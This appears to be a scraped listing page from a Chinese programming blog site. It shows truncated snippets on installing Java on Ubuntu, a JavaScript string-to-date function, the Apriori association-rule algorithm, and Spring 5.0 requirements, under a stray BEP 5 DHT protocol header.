 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
    
                                
    • 
                                
  • Ubuntu下Java环境的搭建
                                    macroli
java工作ubuntu
                                    
    配置命令: 
  $sudo apt-get install ubuntu-restricted-extras 
  再运行如下命令: 
  $sudo apt-get install sun-java6-jdk 
  待安装完毕后选择默认Java. 
  $sudo update- alternatives --config java 
  安装过程提示选择,输入“2”即可,然后按回车键确定。 
    
                                
    • 
                                
  • js字符串转日期(兼容IE所有版本)
                                    qiaolevip
TODateStringIE
                                    
    	/**
	 * 字符串转时间(yyyy-MM-dd HH:mm:ss)
	 * result (分钟)
	 */
	stringToDate : function(fDate){
		var fullDate = fDate.split(" ")[0].split("-");
		var fullTime = fDate.split("
    
                                
    • 
                                
  • 【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析
                                    superlxw1234
sql数据挖掘关联规则
                                    
    关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。 
关联规则揭示了数据项间的未知的依赖关系,根据所挖掘的关联关系,可以从一个数据对象的信息来推断另一个数据对象的信息。 
例如购物篮分析。牛奶 ⇒ 面包 [支持度:3%,置信度:40%]  支持度3%:意味3%顾客同时购买牛奶和面包。   置信度40%:意味购买牛奶的顾客40%也购买面包。   规则的支持度和置信度是两个规则兴
    
                                
    • 
                                
  • Spring 5.0 的系统需求,期待你的反馈
                                    wiselyman
spring
                                    
            
       Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。 
  
       Spring 5.0的特性计划还在工作中,请保持关注,所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。 
 
    
                                
    •